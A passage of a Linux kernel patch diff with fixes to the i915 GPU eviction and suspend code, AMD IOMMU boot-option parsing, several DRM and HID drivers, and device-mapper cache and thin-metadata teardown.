++	 * VM this time around, anything that we can't lock we now track using
++	 * the busy_bo, using the full lock (after dropping the vm->mutex to
++	 * prevent deadlocks), instead of trylock. We then continue to evict the
++	 * VM, this time with the stubborn object locked, which we can now
++	 * hopefully unbind (if still bound in the VM). Repeat until the VM is
++	 * evicted. Finally we should be able bind everything.
+ 	 */
+-	for (pass = 0; pass <= 2; pass++) {
++	for (pass = 0; pass <= 3; pass++) {
+ 		int pin_flags = PIN_USER | PIN_VALIDATE;
+ 
+ 		if (pass == 0)
+ 			pin_flags |= PIN_NONBLOCK;
+ 
+ 		if (pass >= 1)
+-			unpinned = eb_unbind(eb, pass == 2);
++			unpinned = eb_unbind(eb, pass >= 2);
+ 
+ 		if (pass == 2) {
+ 			err = mutex_lock_interruptible(&eb->context->vm->mutex);
+ 			if (!err) {
+-				err = i915_gem_evict_vm(eb->context->vm, &eb->ww);
++				err = i915_gem_evict_vm(eb->context->vm, &eb->ww, NULL);
++				mutex_unlock(&eb->context->vm->mutex);
++			}
++			if (err)
++				return err;
++		}
++
++		if (pass == 3) {
++retry:
++			err = mutex_lock_interruptible(&eb->context->vm->mutex);
++			if (!err) {
++				struct drm_i915_gem_object *busy_bo = NULL;
++
++				err = i915_gem_evict_vm(eb->context->vm, &eb->ww, &busy_bo);
+ 				mutex_unlock(&eb->context->vm->mutex);
++				if (err && busy_bo) {
++					err = i915_gem_object_lock(busy_bo, &eb->ww);
++					i915_gem_object_put(busy_bo);
++					if (!err)
++						goto retry;
++				}
+ 			}
+ 			if (err)
+ 				return err;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index e63329bc80659..354c1d6dab846 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -369,7 +369,7 @@ retry:
+ 		if (vma == ERR_PTR(-ENOSPC)) {
+ 			ret = mutex_lock_interruptible(&ggtt->vm.mutex);
+ 			if (!ret) {
+-				ret = i915_gem_evict_vm(&ggtt->vm, &ww);
++				ret = i915_gem_evict_vm(&ggtt->vm, &ww, NULL);
+ 				mutex_unlock(&ggtt->vm.mutex);
+ 			}
+ 			if (ret)
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.c b/drivers/gpu/drm/i915/gem/i915_gem_object.c
+index 369006c5317f2..a40bc17acead8 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.c
+@@ -761,6 +761,9 @@ bool i915_gem_object_needs_ccs_pages(struct drm_i915_gem_object *obj)
+ 	if (!HAS_FLAT_CCS(to_i915(obj->base.dev)))
+ 		return false;
+ 
++	if (obj->flags & I915_BO_ALLOC_CCS_AUX)
++		return true;
++
+ 	for (i = 0; i < obj->mm.n_placements; i++) {
+ 		/* Compression is not allowed for the objects with smem placement */
+ 		if (obj->mm.placements[i]->type == INTEL_MEMORY_SYSTEM)
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+index d0d6772e6f36a..ab4c2f90a5643 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+@@ -327,16 +327,18 @@ struct drm_i915_gem_object {
+  * dealing with userspace objects the CPU fault handler is free to ignore this.
+  */
+ #define I915_BO_ALLOC_GPU_ONLY	  BIT(6)
++#define I915_BO_ALLOC_CCS_AUX	  BIT(7)
+ #define I915_BO_ALLOC_FLAGS (I915_BO_ALLOC_CONTIGUOUS | \
+ 			     I915_BO_ALLOC_VOLATILE | \
+ 			     I915_BO_ALLOC_CPU_CLEAR | \
+ 			     I915_BO_ALLOC_USER | \
+ 			     I915_BO_ALLOC_PM_VOLATILE | \
+ 			     I915_BO_ALLOC_PM_EARLY | \
+-			     I915_BO_ALLOC_GPU_ONLY)
+-#define I915_BO_READONLY          BIT(7)
+-#define I915_TILING_QUIRK_BIT     8 /* unknown swizzling; do not release! */
+-#define I915_BO_PROTECTED         BIT(9)
++			     I915_BO_ALLOC_GPU_ONLY | \
++			     I915_BO_ALLOC_CCS_AUX)
++#define I915_BO_READONLY          BIT(8)
++#define I915_TILING_QUIRK_BIT     9 /* unknown swizzling; do not release! */
++#define I915_BO_PROTECTED         BIT(10)
+ 	/**
+ 	 * @mem_flags - Mutable placement-related flags
+ 	 *
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c b/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c
+index 07e49f22f2de3..7e67742bc65e0 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c
+@@ -50,6 +50,7 @@ static int i915_ttm_backup(struct i915_gem_apply_to_region *apply,
+ 		container_of(bo->bdev, typeof(*i915), bdev);
+ 	struct drm_i915_gem_object *backup;
+ 	struct ttm_operation_ctx ctx = {};
++	unsigned int flags;
+ 	int err = 0;
+ 
+ 	if (bo->resource->mem_type == I915_PL_SYSTEM || obj->ttm.backup)
+@@ -65,7 +66,22 @@ static int i915_ttm_backup(struct i915_gem_apply_to_region *apply,
+ 	if (obj->flags & I915_BO_ALLOC_PM_VOLATILE)
+ 		return 0;
+ 
+-	backup = i915_gem_object_create_shmem(i915, obj->base.size);
++	/*
++	 * It seems that we might have some framebuffers still pinned at this
++	 * stage, but for such objects we might also need to deal with the CCS
++	 * aux state. Make sure we force the save/restore of the CCS state,
++	 * otherwise we might observe display corruption, when returning from
++	 * suspend.
++	 */
++	flags = 0;
++	if (i915_gem_object_needs_ccs_pages(obj)) {
++		WARN_ON_ONCE(!i915_gem_object_is_framebuffer(obj));
++		WARN_ON_ONCE(!pm_apply->allow_gpu);
++
++		flags = I915_BO_ALLOC_CCS_AUX;
++	}
++	backup = i915_gem_object_create_region(i915->mm.regions[INTEL_REGION_SMEM],
++					       obj->base.size, 0, flags);
+ 	if (IS_ERR(backup))
+ 		return PTR_ERR(backup);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_migrate.c b/drivers/gpu/drm/i915/gt/intel_migrate.c
+index aaaf1906026c1..ee072c7d62eb1 100644
+--- a/drivers/gpu/drm/i915/gt/intel_migrate.c
++++ b/drivers/gpu/drm/i915/gt/intel_migrate.c
+@@ -341,6 +341,16 @@ static int emit_no_arbitration(struct i915_request *rq)
+ 	return 0;
+ }
+ 
++static int max_pte_pkt_size(struct i915_request *rq, int pkt)
++{
++	struct intel_ring *ring = rq->ring;
++
++	pkt = min_t(int, pkt, (ring->space - rq->reserved_space) / sizeof(u32) + 5);
++	pkt = min_t(int, pkt, (ring->size - ring->emit) / sizeof(u32) + 5);
++
++	return pkt;
++}
++
+ static int emit_pte(struct i915_request *rq,
+ 		    struct sgt_dma *it,
+ 		    enum i915_cache_level cache_level,
+@@ -387,8 +397,7 @@ static int emit_pte(struct i915_request *rq,
+ 		return PTR_ERR(cs);
+ 
+ 	/* Pack as many PTE updates as possible into a single MI command */
+-	pkt = min_t(int, dword_length, ring->space / sizeof(u32) + 5);
+-	pkt = min_t(int, pkt, (ring->size - ring->emit) / sizeof(u32) + 5);
++	pkt = max_pte_pkt_size(rq, dword_length);
+ 
+ 	hdr = cs;
+ 	*cs++ = MI_STORE_DATA_IMM | REG_BIT(21); /* as qword elements */
+@@ -421,8 +430,7 @@ static int emit_pte(struct i915_request *rq,
+ 				}
+ 			}
+ 
+-			pkt = min_t(int, dword_rem, ring->space / sizeof(u32) + 5);
+-			pkt = min_t(int, pkt, (ring->size - ring->emit) / sizeof(u32) + 5);
++			pkt = max_pte_pkt_size(rq, dword_rem);
+ 
+ 			hdr = cs;
+ 			*cs++ = MI_STORE_DATA_IMM | REG_BIT(21);
+diff --git a/drivers/gpu/drm/i915/i915_gem_evict.c b/drivers/gpu/drm/i915/i915_gem_evict.c
+index f025ee4fa5261..a4b4d9b7d26c7 100644
+--- a/drivers/gpu/drm/i915/i915_gem_evict.c
++++ b/drivers/gpu/drm/i915/i915_gem_evict.c
+@@ -416,6 +416,11 @@ int i915_gem_evict_for_node(struct i915_address_space *vm,
+  * @vm: Address space to cleanse
+  * @ww: An optional struct i915_gem_ww_ctx. If not NULL, i915_gem_evict_vm
+  * will be able to evict vma's locked by the ww as well.
++ * @busy_bo: Optional pointer to struct drm_i915_gem_object. If not NULL, then
++ * in the event i915_gem_evict_vm() is unable to trylock an object for eviction,
++ * then @busy_bo will point to it. -EBUSY is also returned. The caller must drop
++ * the vm->mutex, before trying again to acquire the contended lock. The caller
++ * also owns a reference to the object.
+  *
+  * This function evicts all vmas from a vm.
+  *
+@@ -425,7 +430,8 @@ int i915_gem_evict_for_node(struct i915_address_space *vm,
+  * To clarify: This is for freeing up virtual address space, not for freeing
+  * memory in e.g. the shrinker.
+  */
+-int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww)
++int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww,
++		      struct drm_i915_gem_object **busy_bo)
+ {
+ 	int ret = 0;
+ 
+@@ -457,15 +463,22 @@ int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww)
+ 			 * the resv is shared among multiple objects, we still
+ 			 * need the object ref.
+ 			 */
+-			if (dying_vma(vma) ||
++			if (!i915_gem_object_get_rcu(vma->obj) ||
+ 			    (ww && (dma_resv_locking_ctx(vma->obj->base.resv) == &ww->ctx))) {
+ 				__i915_vma_pin(vma);
+ 				list_add(&vma->evict_link, &locked_eviction_list);
+ 				continue;
+ 			}
+ 
+-			if (!i915_gem_object_trylock(vma->obj, ww))
++			if (!i915_gem_object_trylock(vma->obj, ww)) {
++				if (busy_bo) {
++					*busy_bo = vma->obj; /* holds ref */
++					ret = -EBUSY;
++					break;
++				}
++				i915_gem_object_put(vma->obj);
+ 				continue;
++			}
+ 
+ 			__i915_vma_pin(vma);
+ 			list_add(&vma->evict_link, &eviction_list);
+@@ -473,25 +486,29 @@ int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww)
+ 		if (list_empty(&eviction_list) && list_empty(&locked_eviction_list))
+ 			break;
+ 
+-		ret = 0;
+ 		/* Unbind locked objects first, before unlocking the eviction_list */
+ 		list_for_each_entry_safe(vma, vn, &locked_eviction_list, evict_link) {
+ 			__i915_vma_unpin(vma);
+ 
+-			if (ret == 0)
++			if (ret == 0) {
+ 				ret = __i915_vma_unbind(vma);
+-			if (ret != -EINTR) /* "Get me out of here!" */
+-				ret = 0;
++				if (ret != -EINTR) /* "Get me out of here!" */
++					ret = 0;
++			}
++			if (!dying_vma(vma))
++				i915_gem_object_put(vma->obj);
+ 		}
+ 
+ 		list_for_each_entry_safe(vma, vn, &eviction_list, evict_link) {
+ 			__i915_vma_unpin(vma);
+-			if (ret == 0)
++			if (ret == 0) {
+ 				ret = __i915_vma_unbind(vma);
+-			if (ret != -EINTR) /* "Get me out of here!" */
+-				ret = 0;
++				if (ret != -EINTR) /* "Get me out of here!" */
++					ret = 0;
++			}
+ 
+ 			i915_gem_object_unlock(vma->obj);
++			i915_gem_object_put(vma->obj);
+ 		}
+ 	} while (ret == 0);
+ 
+diff --git a/drivers/gpu/drm/i915/i915_gem_evict.h b/drivers/gpu/drm/i915/i915_gem_evict.h
+index e593c530f9bd7..bf0ee0e4fe608 100644
+--- a/drivers/gpu/drm/i915/i915_gem_evict.h
++++ b/drivers/gpu/drm/i915/i915_gem_evict.h
+@@ -11,6 +11,7 @@
+ struct drm_mm_node;
+ struct i915_address_space;
+ struct i915_gem_ww_ctx;
++struct drm_i915_gem_object;
+ 
+ int __must_check i915_gem_evict_something(struct i915_address_space *vm,
+ 					  struct i915_gem_ww_ctx *ww,
+@@ -23,6 +24,7 @@ int __must_check i915_gem_evict_for_node(struct i915_address_space *vm,
+ 					 struct drm_mm_node *node,
+ 					 unsigned int flags);
+ int i915_gem_evict_vm(struct i915_address_space *vm,
+-		      struct i915_gem_ww_ctx *ww);
++		      struct i915_gem_ww_ctx *ww,
++		      struct drm_i915_gem_object **busy_bo);
+ 
+ #endif /* __I915_GEM_EVICT_H__ */
+diff --git a/drivers/gpu/drm/i915/i915_vma.c b/drivers/gpu/drm/i915/i915_vma.c
+index f17c09ead7d77..4d06875de14a1 100644
+--- a/drivers/gpu/drm/i915/i915_vma.c
++++ b/drivers/gpu/drm/i915/i915_vma.c
+@@ -1569,7 +1569,7 @@ static int __i915_ggtt_pin(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 			 * locked objects when called from execbuf when pinning
+ 			 * is removed. This would probably regress badly.
+ 			 */
+-			i915_gem_evict_vm(vm, NULL);
++			i915_gem_evict_vm(vm, NULL, NULL);
+ 			mutex_unlock(&vm->mutex);
+ 		}
+ 	} while (1);
+diff --git a/drivers/gpu/drm/i915/selftests/i915_gem_evict.c b/drivers/gpu/drm/i915/selftests/i915_gem_evict.c
+index 8c6517d29b8e0..37068542aafe7 100644
+--- a/drivers/gpu/drm/i915/selftests/i915_gem_evict.c
++++ b/drivers/gpu/drm/i915/selftests/i915_gem_evict.c
+@@ -344,7 +344,7 @@ static int igt_evict_vm(void *arg)
+ 
+ 	/* Everything is pinned, nothing should happen */
+ 	mutex_lock(&ggtt->vm.mutex);
+-	err = i915_gem_evict_vm(&ggtt->vm, NULL);
++	err = i915_gem_evict_vm(&ggtt->vm, NULL, NULL);
+ 	mutex_unlock(&ggtt->vm.mutex);
+ 	if (err) {
+ 		pr_err("i915_gem_evict_vm on a full GGTT returned err=%d]\n",
+@@ -356,7 +356,7 @@ static int igt_evict_vm(void *arg)
+ 
+ 	for_i915_gem_ww(&ww, err, false) {
+ 		mutex_lock(&ggtt->vm.mutex);
+-		err = i915_gem_evict_vm(&ggtt->vm, &ww);
++		err = i915_gem_evict_vm(&ggtt->vm, &ww, NULL);
+ 		mutex_unlock(&ggtt->vm.mutex);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/ingenic/ingenic-drm-drv.c b/drivers/gpu/drm/ingenic/ingenic-drm-drv.c
+index ab0515d2c420a..4499a04f7c138 100644
+--- a/drivers/gpu/drm/ingenic/ingenic-drm-drv.c
++++ b/drivers/gpu/drm/ingenic/ingenic-drm-drv.c
+@@ -1629,7 +1629,11 @@ static int ingenic_drm_init(void)
+ 			return err;
+ 	}
+ 
+-	return platform_driver_register(&ingenic_drm_driver);
++	err = platform_driver_register(&ingenic_drm_driver);
++	if (IS_ENABLED(CONFIG_DRM_INGENIC_IPU) && err)
++		platform_driver_unregister(ingenic_ipu_driver_ptr);
++
++	return err;
+ }
+ module_init(ingenic_drm_init);
+ 
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200se.c b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+index be389ed91cbd8..bd6e573c9a1a3 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200se.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+@@ -284,7 +284,8 @@ static void mgag200_g200se_04_pixpllc_atomic_update(struct drm_crtc *crtc,
+ 	pixpllcp = pixpllc->p - 1;
+ 	pixpllcs = pixpllc->s;
+ 
+-	xpixpllcm = pixpllcm | ((pixpllcn & BIT(8)) >> 1);
++	// For G200SE A, BIT(7) should be set unconditionally.
++	xpixpllcm = BIT(7) | pixpllcm;
+ 	xpixpllcn = pixpllcn;
+ 	xpixpllcp = (pixpllcs << 3) | pixpllcp;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 214829c32ed87..7a2f262414ad4 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -308,7 +308,8 @@ void vmw_kms_cursor_snoop(struct vmw_surface *srf,
+ 	if (cmd->dma.guest.ptr.offset % PAGE_SIZE ||
+ 	    box->x != 0    || box->y != 0    || box->z != 0    ||
+ 	    box->srcx != 0 || box->srcy != 0 || box->srcz != 0 ||
+-	    box->d != 1    || box_count != 1) {
++	    box->d != 1    || box_count != 1 ||
++	    box->w > 64 || box->h > 64) {
+ 		/* TODO handle none page aligned offsets */
+ 		/* TODO handle more dst & src != 0 */
+ 		/* TODO handle more then one copy */
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index e27fb27a36bfa..82713ef3aaa64 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -412,6 +412,7 @@
+ #define USB_DEVICE_ID_HP_X2_10_COVER	0x0755
+ #define I2C_DEVICE_ID_HP_ENVY_X360_15	0x2d05
+ #define I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100	0x29CF
++#define I2C_DEVICE_ID_HP_ENVY_X360_EU0009NV	0x2CF9
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_15	0x2817
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index d728a94c642eb..3ee5a9fea20e6 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -380,6 +380,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_EU0009NV),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_SPECTRE_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN),
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 1a2d425bf5687..34029d1161073 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -3402,18 +3402,24 @@ static int __init parse_amd_iommu_options(char *str)
+ static int __init parse_ivrs_ioapic(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+-	int ret, id, i;
++	int id, i;
+ 	u32 devid;
+ 
+-	ret = sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn);
+-	if (ret != 4) {
+-		ret = sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn);
+-		if (ret != 5) {
+-			pr_err("Invalid command line: ivrs_ioapic%s\n", str);
+-			return 1;
+-		}
++	if (sscanf(str, "=%d@%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "=%d@%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5)
++		goto found;
++
++	if (sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5) {
++		pr_warn("ivrs_ioapic%s option format deprecated; use ivrs_ioapic=%d@%04x:%02x:%02x.%d instead\n",
++			str, id, seg, bus, dev, fn);
++		goto found;
+ 	}
+ 
++	pr_err("Invalid command line: ivrs_ioapic%s\n", str);
++	return 1;
++
++found:
+ 	if (early_ioapic_map_size == EARLY_MAP_SIZE) {
+ 		pr_err("Early IOAPIC map overflow - ignoring ivrs_ioapic%s\n",
+ 			str);
+@@ -3434,18 +3440,24 @@ static int __init parse_ivrs_ioapic(char *str)
+ static int __init parse_ivrs_hpet(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+-	int ret, id, i;
++	int id, i;
+ 	u32 devid;
+ 
+-	ret = sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn);
+-	if (ret != 4) {
+-		ret = sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn);
+-		if (ret != 5) {
+-			pr_err("Invalid command line: ivrs_hpet%s\n", str);
+-			return 1;
+-		}
++	if (sscanf(str, "=%d@%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "=%d@%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5)
++		goto found;
++
++	if (sscanf(str, "[%d]=%x:%x.%x", &id, &bus, &dev, &fn) == 4 ||
++	    sscanf(str, "[%d]=%x:%x:%x.%x", &id, &seg, &bus, &dev, &fn) == 5) {
++		pr_warn("ivrs_hpet%s option format deprecated; use ivrs_hpet=%d@%04x:%02x:%02x.%d instead\n",
++			str, id, seg, bus, dev, fn);
++		goto found;
+ 	}
+ 
++	pr_err("Invalid command line: ivrs_hpet%s\n", str);
++	return 1;
++
++found:
+ 	if (early_hpet_map_size == EARLY_MAP_SIZE) {
+ 		pr_err("Early HPET map overflow - ignoring ivrs_hpet%s\n",
+ 			str);
+@@ -3466,19 +3478,36 @@ static int __init parse_ivrs_hpet(char *str)
+ static int __init parse_ivrs_acpihid(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+-	char *hid, *uid, *p;
++	char *hid, *uid, *p, *addr;
+ 	char acpiid[ACPIHID_UID_LEN + ACPIHID_HID_LEN] = {0};
+-	int ret, i;
+-
+-	ret = sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid);
+-	if (ret != 4) {
+-		ret = sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid);
+-		if (ret != 5) {
+-			pr_err("Invalid command line: ivrs_acpihid(%s)\n", str);
+-			return 1;
++	int i;
++
++	addr = strchr(str, '@');
++	if (!addr) {
++		if (sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid) == 4 ||
++		    sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid) == 5) {
++			pr_warn("ivrs_acpihid%s option format deprecated; use ivrs_acpihid=%s@%04x:%02x:%02x.%d instead\n",
++				str, acpiid, seg, bus, dev, fn);
++			goto found;
+ 		}
++		goto not_found;
+ 	}
+ 
++	/* We have the '@', make it the terminator to get just the acpiid */
++	*addr++ = 0;
++
++	if (sscanf(str, "=%s", acpiid) != 1)
++		goto not_found;
++
++	if (sscanf(addr, "%x:%x.%x", &bus, &dev, &fn) == 3 ||
++	    sscanf(addr, "%x:%x:%x.%x", &seg, &bus, &dev, &fn) == 4)
++		goto found;
++
++not_found:
++	pr_err("Invalid command line: ivrs_acpihid%s\n", str);
++	return 1;
++
++found:
+ 	p = acpiid;
+ 	hid = strsep(&p, ":");
+ 	uid = p;
+@@ -3488,6 +3517,13 @@ static int __init parse_ivrs_acpihid(char *str)
+ 		return 1;
+ 	}
+ 
++	/*
++	 * Ignore leading zeroes after ':', so e.g., AMDI0095:00
++	 * will match AMDI0095:0 in the second strcmp in acpi_dev_hid_uid_match
++	 */
++	while (*uid == '0' && *(uid + 1))
++		uid++;
++
+ 	i = early_acpihid_map_size++;
+ 	memcpy(early_acpihid_map[i].hid, hid, strlen(hid));
+ 	memcpy(early_acpihid_map[i].uid, uid, strlen(uid));
+diff --git a/drivers/md/dm-cache-metadata.c b/drivers/md/dm-cache-metadata.c
+index ab13b73802650..83a5975bcc729 100644
+--- a/drivers/md/dm-cache-metadata.c
++++ b/drivers/md/dm-cache-metadata.c
+@@ -551,11 +551,13 @@ static int __create_persistent_data_objects(struct dm_cache_metadata *cmd,
+ 	return r;
+ }
+ 
+-static void __destroy_persistent_data_objects(struct dm_cache_metadata *cmd)
++static void __destroy_persistent_data_objects(struct dm_cache_metadata *cmd,
++					      bool destroy_bm)
+ {
+ 	dm_sm_destroy(cmd->metadata_sm);
+ 	dm_tm_destroy(cmd->tm);
+-	dm_block_manager_destroy(cmd->bm);
++	if (destroy_bm)
++		dm_block_manager_destroy(cmd->bm);
+ }
+ 
+ typedef unsigned long (*flags_mutator)(unsigned long);
+@@ -826,7 +828,7 @@ static struct dm_cache_metadata *lookup_or_open(struct block_device *bdev,
+ 		cmd2 = lookup(bdev);
+ 		if (cmd2) {
+ 			mutex_unlock(&table_lock);
+-			__destroy_persistent_data_objects(cmd);
++			__destroy_persistent_data_objects(cmd, true);
+ 			kfree(cmd);
+ 			return cmd2;
+ 		}
+@@ -874,7 +876,7 @@ void dm_cache_metadata_close(struct dm_cache_metadata *cmd)
+ 		mutex_unlock(&table_lock);
+ 
+ 		if (!cmd->fail_io)
+-			__destroy_persistent_data_objects(cmd);
++			__destroy_persistent_data_objects(cmd, true);
+ 		kfree(cmd);
+ 	}
+ }
+@@ -1807,14 +1809,52 @@ int dm_cache_metadata_needs_check(struct dm_cache_metadata *cmd, bool *result)
+ 
+ int dm_cache_metadata_abort(struct dm_cache_metadata *cmd)
+ {
+-	int r;
++	int r = -EINVAL;
++	struct dm_block_manager *old_bm = NULL, *new_bm = NULL;
++
++	/* fail_io is double-checked with cmd->root_lock held below */
++	if (unlikely(cmd->fail_io))
++		return r;
++
++	/*
++	 * Replacement block manager (new_bm) is created and old_bm destroyed outside of
++	 * cmd root_lock to avoid ABBA deadlock that would result (due to life-cycle of
++	 * shrinker associated with the block manager's bufio client vs cmd root_lock).
++	 * - must take shrinker_rwsem without holding cmd->root_lock
++	 */
++	new_bm = dm_block_manager_create(cmd->bdev, DM_CACHE_METADATA_BLOCK_SIZE << SECTOR_SHIFT,
++					 CACHE_MAX_CONCURRENT_LOCKS);
+ 
+ 	WRITE_LOCK(cmd);
+-	__destroy_persistent_data_objects(cmd);
+-	r = __create_persistent_data_objects(cmd, false);
++	if (cmd->fail_io) {
++		WRITE_UNLOCK(cmd);
++		goto out;
++	}
++
++	__destroy_persistent_data_objects(cmd, false);
++	old_bm = cmd->bm;
++	if (IS_ERR(new_bm)) {
++		DMERR("could not create block manager during abort");
++		cmd->bm = NULL;
++		r = PTR_ERR(new_bm);
++		goto out_unlock;
++	}
++
++	cmd->bm = new_bm;
++	r = __open_or_format_metadata(cmd, false);
++	if (r) {
++		cmd->bm = NULL;
++		goto out_unlock;
++	}
++	new_bm = NULL;
++out_unlock:
+ 	if (r)
+ 		cmd->fail_io = true;
+ 	WRITE_UNLOCK(cmd);
++	dm_block_manager_destroy(old_bm);
++out:
++	if (new_bm && !IS_ERR(new_bm))
++		dm_block_manager_destroy(new_bm);
+ 
+ 	return r;
+ }
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 54a8d5c9a44ea..5e92fac90b675 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -907,16 +907,16 @@ static void abort_transaction(struct cache *cache)
+ 	if (get_cache_mode(cache) >= CM_READ_ONLY)
+ 		return;
+ 
+-	if (dm_cache_metadata_set_needs_check(cache->cmd)) {
+-		DMERR("%s: failed to set 'needs_check' flag in metadata", dev_name);
+-		set_cache_mode(cache, CM_FAIL);
+-	}
+-
+ 	DMERR_LIMIT("%s: aborting current metadata transaction", dev_name);
+ 	if (dm_cache_metadata_abort(cache->cmd)) {
+ 		DMERR("%s: failed to abort metadata transaction", dev_name);
+ 		set_cache_mode(cache, CM_FAIL);
+ 	}
++
++	if (dm_cache_metadata_set_needs_check(cache->cmd)) {
++		DMERR("%s: failed to set 'needs_check' flag in metadata", dev_name);
++		set_cache_mode(cache, CM_FAIL);
++	}
+ }
+ 
+ static void metadata_operation_failed(struct cache *cache, const char *op, int r)
+@@ -1887,6 +1887,7 @@ static void destroy(struct cache *cache)
+ 	if (cache->prison)
+ 		dm_bio_prison_destroy_v2(cache->prison);
+ 
++	cancel_delayed_work_sync(&cache->waker);
+ 	if (cache->wq)
+ 		destroy_workqueue(cache->wq);
+ 
+diff --git a/drivers/md/dm-clone-target.c b/drivers/md/dm-clone-target.c
+index 2f1cc66d26412..29e0b85eeaf09 100644
+--- a/drivers/md/dm-clone-target.c
++++ b/drivers/md/dm-clone-target.c
+@@ -1958,6 +1958,7 @@ static void clone_dtr(struct dm_target *ti)
+ 
+ 	mempool_exit(&clone->hydration_pool);
+ 	dm_kcopyd_client_destroy(clone->kcopyd_client);
++	cancel_delayed_work_sync(&clone->waker);
+ 	destroy_workqueue(clone->wq);
+ 	hash_table_exit(clone);
+ 	dm_clone_metadata_close(clone->cmd);
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index e97e9f97456d4..1388ee35571e0 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4558,6 +4558,8 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	BUG_ON(!RB_EMPTY_ROOT(&ic->in_progress));
+ 	BUG_ON(!list_empty(&ic->wait_list));
+ 
++	if (ic->mode == 'B')
++		cancel_delayed_work_sync(&ic->bitmap_flush_work);
+ 	if (ic->metadata_wq)
+ 		destroy_workqueue(ic->metadata_wq);
+ 	if (ic->wait_wq)
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index a27395c8621ff..6bcc4c4786d89 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -724,6 +724,15 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 		goto bad_cleanup_data_sm;
+ 	}
+ 
++	/*
++	 * For pool metadata opening process, root setting is redundant
